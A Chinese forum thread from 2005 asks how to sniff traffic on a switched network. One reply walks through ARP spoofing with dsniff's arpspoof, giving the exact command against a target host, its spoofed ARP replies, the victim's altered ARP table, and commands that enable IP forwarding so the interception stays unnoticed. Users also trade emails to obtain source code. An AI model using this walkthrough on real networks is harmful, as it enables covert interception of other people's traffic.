社区
通信技术
帖子详情
如何在交换式网络上进行监听?
beauty2004
2005-05-08 02:20:09
arp欺骗技术可以实现么?
如果可以,具体如何实现呢?
...全文
486
8
打赏
收藏
如何在交换式网络上进行监听?
arp欺骗技术可以实现么? 如果可以,具体如何实现呢?
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
8 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
wangbangjie
2005-05-20
打赏
举报
回复
大家互相研究!
beauty2004
2005-05-19
打赏
举报
回复
To:浪子
收到了,先谢谢你
我在一个地方卡住了,暂时没什么进展
以后还请多多指教
hantry
2005-05-19
打赏
举报
回复
hantry@613.com
hantry
2005-05-19
打赏
举报
回复
to:wangbangjie(浪子)
源码也给俺一份行不?
wangbangjie
2005-05-17
打赏
举报
回复
我发了,楼主受到了吗
beauty2004
2005-05-10
打赏
举报
回复
如果自己能够实现那个软件包的功能那就太好了,把源码发给我一份好么?谢谢
我的邮箱:
beautywelli@hotmail.com
或者beautywelli@163.com
wangbangjie
2005-05-09
打赏
举报
回复
可以啊,目前Dsniff和Ethercap都能有效的截获交换式网络的数据.
如dsniff,这个软件包有一个叫arpspoof的组件,它就具有你要的功能,工作原理是这样的:发起arpspoof的主机向目标主机发送伪造的arp应答包,骗取目标系统更新arp表,将目标系统的网关的mac地址修改为发起arpspoof的主机mac地址,使数据包都经由发起arpspoof的主机,这样即使系统连接在交换机上,也不会影响对数据包的攫取,由此就轻松的通过交换机实现了网络监听。
举例如下:
主机a和b连接在交换机的同一个vlan上,
A机的ip地址:192.168.1.37
B机的ip地址:192.168.1.35,mac地址为:08-00-20-c8-fe-15
网关的ip地址:192.168.1.33,mac地址为:00-90-6d-f2-24-00
首先在a机上看看a机的arp表
C:\ >arp -a
Interface: 192.168.1.37
Internet Address Physical Address Type
192.168.1.33 00-90-6d-f2-24-00 dynamic
我们看到a机中保留着网关的ip地址192.168.1.33和对应的mac地址00-90-6d-f2-24-00
我们在B机上执行arpspoof,将目标指向a机,宣称自己为网关,如下:
HOSTB# arpspoof -t 192.168.1.37 192.168.1.33
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
8:0:20:c8:fe:15 0:50:ba:1a:f:c0 0806 42: arp reply 192.168.1.33 is-at 8:0:20:c8:fe:15
可以看到b机持续向a发送arp回应包,宣称网关192.168.1.33的mac地址是自己!此时,我们在a机上看看arp表的内容,
C:\>arp -a
Interface: 192.168.1.37
Internet Address Physical Address Type
192.168.1.33 08-00-20-c8-fe-15 dynamic
哈!a机的arp表已经改变了,网关的mac地址被更新为了 b机的mac地址,这样,当有数据包发送时,a机理所当然的会发到它arp表中网关对应的mac地址08-00-20-c8-fe-15,然而这个地方的b机正在等待着,悄然无声的冒充网关收发着a机的数据包。
有一点要说明的是,为了让a机能正常使用网络,b机还必须打开数据转发,
linux中可以使用
sysctl -w net.ipv4.ip_forward = 1
bsd系统可以使用
sysctl -w net.inet.ip.forwarding =1
solaris系统可以使用
ndd -set /dev/ip ip_forwarding 1
除了这样打开内核的支持外,也可以选用外部的fragrouter等转发软件,如此,就能确保a机正常工作了。
另外,我这里有源码,要的话,跟我说一下
qrlvls
2005-05-08
打赏
举报
回复
可以实现,不过始终不方便,很容易受限制
华为HCNP/HCIP路由交换高级
网络
工程师
课程主要介绍思科主流的交换技术与路由技术,学习完本课程后你将具有相应的技能水平,能够对中大型企业
网络
或校园
网络
的
网络
架构有更加深入的了解以及各技术所应用场景,清楚技术特点,还能够对中大型企业网或校园网...
对共享
网络
与交换
网络
进行
监听
1、发生在共享式局域网内的窃听 所谓的“共享式”局域网(Hub-Based Lan),指的是早期采用集线器HUB作为
网络
连接设备的传统以太网的结构,在这个结构里,所有机器都是共享同一条传输线路的,集线器没有端口的概念,它的数据发送方式是“广播”, 集线器接收到相应数据时是单纯的把数据往它所连接的每一台设备线路上发送的,例如一台机器发送一条“我要和小金说话”的报文,那么所有连接这个集线
网络
监听
概述
一、
网络
监听
原理:
网络
监听
技术可以监视获取
网络
的状态、数据流动情况以及
网络
中传输的信息等,使得
网络
管理人员可以用
监听
技术来
进行
网络
管理、排除
网络
故障。但同时,
监听
技术也为许多入侵活动提供了便利与基础,会导致了密码口令被非法获取、敏感信息泄露被截等安全事件的发生。
网络
监听
可分为被动
监听
和主动
监听
。 二、
网络
监听
分类 (一)被动
监听
以太网是目前应用最广泛的局域网,而 IEEE 802.3 的以太局域网采用广播机制,即局域网上的所有主机共享相同的通信链路。而数据的接发实际上是由网卡来完成,每个..
【
网络
与系统安全实验】
网络
监听
及防御技术
网络
监听
及防御技术
网络
监听
概述 基础知识
网络
监听
的概念
网络
监听
技术又叫做
网络
嗅探技术,顾名思义这是一种在他方未察觉的情况下捕获其通信报文或通信内容的技术。 在
网络
安全领域,
网络
监听
技术对于
网络
攻击与防范双方都有着重要的意义,是一把双刃剑。
网络
监听
技术的能力范围目前只限于局域网,它是主机的一种工作模式,主机可以接收到本网段在同一条物理通道上传输的所有信息,而不管这些信息的发送方和接收方是谁。...
网络
攻防---信息收集----
网络
查点与
网络
监听
技术
网络
查点
网络
监听
技术 听课笔记--《
网络
攻击与防御》
网络
查点:根据
网络
扫描的结果进一步地对目标主机的服务以及系统版本等信息
进行
更具针对性的检测,来寻找真正可以攻击的入口,以及攻击过程中可能需要的关键数据。 (1)服务判定---根据端口判定 直接利用端口与服务对应的关系,比如telnet--23; ftp--21; http---80 精度较低 例如:目标主机使用nc这样的工具在...
通信技术
4,356
社区成员
28,926
社区内容
发帖
与我相关
我的任务
通信技术
通信技术相关讨论
复制链接
扫一扫
分享
社区描述
通信技术相关讨论
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章